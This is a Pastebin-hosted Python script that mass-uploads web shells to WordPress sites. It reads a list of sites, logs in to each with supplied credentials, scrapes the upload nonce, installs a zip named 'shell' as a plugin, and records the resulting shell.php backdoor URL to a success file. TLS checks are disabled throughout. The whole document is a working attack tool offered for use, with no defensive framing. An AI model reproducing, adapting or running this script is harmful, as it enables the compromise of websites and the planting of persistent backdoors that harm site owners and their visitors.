ToKeiChun

Auto Upload Shell In CMS Wordpress (Version : 1.0)

Nov 23rd, 2020
530
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.41 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. """
  4. Auto Upload Shell In CMS Wordpress
  5. Version : 1.0
  6. """
  7.  
  8. import re
  9. import sys
  10. import requests
  11. import argparse
  12. from random import choice
  13. from string import ascii_lowercase
  14.  
  15. # Disable Warning https
  16. import requests
  17. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  18. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  19.  
  20. logsukses = "success.txt"
  21. logfail = "failed.txt"
  22.  
  23. bener = "\033[32;1m[+]\033[0m "
  24. salah = "\033[31;1m[-]\033[0m "
  25. tambah = "\033[32;1m | \033[0m"
  26. kontl = "\033[31;1m | \033[0m"
  27.  
  28. def uploadbackdoor(host,username,password,type, agent):
  29.     sukses = open(logsukses, "a")
  30.     gagal = open(logfail, "a")
  31.     if host.endswith('/'):
  32.         host = host[:-1]
  33.     url = host + '/wp-login.php'
  34.     headers = {'user-agent': agent,'Accept-Encoding' : 'none'}
  35.     payload = {'log': username,'pwd': password,'rememberme': 'forever','wp-submit': 'log In','redirect_to': host + '/wp-admin/','testcookie': 1}
  36.     uploaddir = (''.join(choice(ascii_lowercase) for i in range(7)))
  37.     session = requests.Session()
  38.     try:
  39.         r = session.post(url, headers=headers, data=payload, allow_redirects=False, verify=False, timeout=15)
  40.         if r.status_code == 200:
  41.             print(bener + host)
  42.         else:
  43.             print(salah + host)
  44.             gagal.write(host+" -> Fail Login\n")
  45.             print("\n")
  46.             pass
  47.         r3 = session.get(host + '/wp-admin/plugin-install.php?tab=upload',headers=headers, verify=False, timeout=12)
  48.         if r3.status_code == 200:
  49.             look_for = 'name="_wpnonce" value="'
  50.             try:
  51.                 nonceText = r3.text.split(look_for, 1)[1]
  52.                 nonce = nonceText[0:10]
  53.                 print(tambah + "WPNonce : " + nonce)
  54.             except:
  55.                 print(kontl + "WPNonce : Fail Get nonce :(")
  56.                 gagal.write(host+" -> Fail Get nonce\n")
  57.                 pass
  58.            
  59.             try:
  60.                 files = {'pluginzip': (uploaddir + '.zip', open(type +'.zip', 'rb')),'_wpnonce': (None, nonce),'_wp_http_referer': (None, host + '/wp-admin/plugin-install.php?tab=upload'),'install-plugin-submit': (None,'Install Now')}
  61.                 r4 = session.post(host + "/wp-admin/update.php?action=upload-plugin",headers=headers, files=files, verify=False, timeout=30)
  62.                 if r.status_code == 200:
  63.                     print(tambah + "Success Upload Shell")
  64.                     if "Plugin installed successfully" in r4.text:
  65.                         print(tambah + "Respone : Plugin installed successfully")
  66.                     if "Destination folder already exists" in r4.text:
  67.                         print(kontl + "Respone : Destination folder already exists")
  68.                 print(tambah + "Access Shell : "+host+"/wp-content/plugins/"+uploaddir+"/shell.php")
  69.                 sukses.write(host+"/wp-content/plugins/"+uploaddir+"/shell.php\n")
  70.                 print("\n")
  71.             except Exception as e:
  72.                 print(salah + host)
  73.                 print(kontl + "Error : " + str(e))
  74.                 gagal.write(host+" -> "+str(e)+"\n")
  75.                 print("\n")
  76.     except Exception as e:
  77.         print(salah + host)
  78.         print(kontl + "Error : " + str(e))
  79.         gagal.write(host+" -> "+str(e)+"\n")
  80.         print("\n")
  81.  
  82. try:
  83.     filelist = sys.argv[1]
  84.     user = sys.argv[2]
  85.     password = sys.argv[3]
  86.    
  87.     # Configurenya G Usah Di Ubah Kalau gk ngerti !
  88.     type = "shell" # change name plugins!
  89.     ua = "Linux Mozilla 5/0"
  90.  
  91.     lst = open(filelist,'r')
  92.     for i in lst.readlines():
  93.         a = i.replace('\n', '')
  94.         i = a.replace('\r','')
  95.         uploadbackdoor(i,user,password,type, ua)
  96. except IOError:
  97.     print("python2 auto-upload.py sites.txt Username Password")
  98. except KeyboardInterrupt:
  99.     print("CTRL+C Detect Close Tools")
  100.     exit()
  101. except Exception as err:
  102.     print("Error : "+str(err))
  103.     exit()
Add Comment
Please, Sign In to add comment